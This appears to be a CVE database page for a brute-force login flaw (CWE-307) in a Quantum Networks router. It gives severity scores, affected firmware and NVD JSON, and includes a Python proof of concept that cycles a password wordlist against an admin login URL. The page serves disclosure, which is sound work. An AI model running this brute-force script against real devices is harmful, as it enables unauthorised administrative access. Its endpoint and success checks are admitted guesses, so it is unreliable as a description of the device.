Security Vulnerability Report
CVE-2026-41037 CVSS 8.8 HIGH

CVE-2026-41037

Published: 2026-04-21 10:16:31
Last Modified: 2026-05-06 18:12:20

Description

This vulnerability exists in Quantum Networks router due to missing rate limiting and CAPTCHA protection for failed login attempts in the web-based management interface. An attacker on the same network could exploit this vulnerability by performing brute force attacks against administrative credentials, leading to unauthorized access with root privileges on the targeted device.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:qntmnet:qn-i-470_firmware:6.1.1.b1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:qntmnet:qn-i-470:-:*:*:*:*:*:*:* - NOT VULNERABLE
Quantum Networks Router (specific version not stated)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Illustration of CWE-307 (no restriction on repeated failed logins) for
# CVE-2026-41037. The endpoint path, form field names and success heuristics
# below are generic guesses at a "typical" login form; nothing on this page
# shows that they match the QN-I-470 web interface.
# Defender's reading: each wordlist entry becomes one login POST, sent with no
# delay in between. Lockout or throttling on failed logins ends such a loop
# after a few attempts, and on the wire it appears as a rapid series of POSTs
# to the management login page from a single adjacent host.

# Target settings: address of the management login page of the device under test.
target_url = "http://192.168.1.1/admin/login.php"
username = "admin"
wordlist = ["admin", "password", "123456", "root", "admin123"]


def brute_force_attack():
    """Try each wordlist password for ``username`` against ``target_url``.

    Returns True as soon as a response looks like a successful login, and
    False when the wordlist is exhausted or a request error stops the loop.
    """
    print(f"[*] Starting brute force attack on {target_url}")

    for candidate in wordlist:
        # Field names follow a generic login form, not a documented device API.
        form_fields = dict(username=username, password=candidate, submit="Login")

        try:
            # Consecutive requests with no pause: the missing rate limiting
            # described in the advisory is what leaves this unthrottled.
            reply = requests.post(target_url, data=form_fields, timeout=3)

            # Heuristic only: a "dashboard" substring or a 302 status is treated
            # as success; neither is confirmed for this firmware.
            page_text = reply.text.lower()
            looks_logged_in = "dashboard" in page_text or reply.status_code == 302
            if not looks_logged_in:
                print(f"[-] Failed attempt: {candidate}")
                continue

            print(f"[+] SUCCESS! Credentials found -> {username}:{candidate}")
            return True
        except requests.RequestException as err:
            print(f"[!] Connection error: {err}")
            break

    print("[-] Brute force completed. No valid credentials found in wordlist.")
    return False


if __name__ == "__main__":
    brute_force_attack()

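References

https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0200 (tags: Patch, Vendor Advisory)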

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41037", "sourceIdentifier": "[email protected]", "published": "2026-04-21T10:16:30.957", "lastModified": "2026-05-06T18:12:19.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "This vulnerability exists in Quantum Networks router due to missing rate limiting and CAPTCHA protection for failed login attempts in the web-based management interface. An attacker on the same network could exploit this vulnerability by performing brute force attacks against administrative credentials, leading to unauthorized access with root privileges on the targeted device."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": 
"NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qntmnet:qn-i-470_firmware:6.1.1.b1:*:*:*:*:*:*:*", "matchCriteriaId": "A9418B1D-1A2C-4134-BF4A-854F6942D3DE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qntmnet:qn-i-470:-:*:*:*:*:*:*:*", "matchCriteriaId": "695A22BB-D237-4EB0-B4F7-901C86E98625"}]}]}], "references": [{"url": "https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0200", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}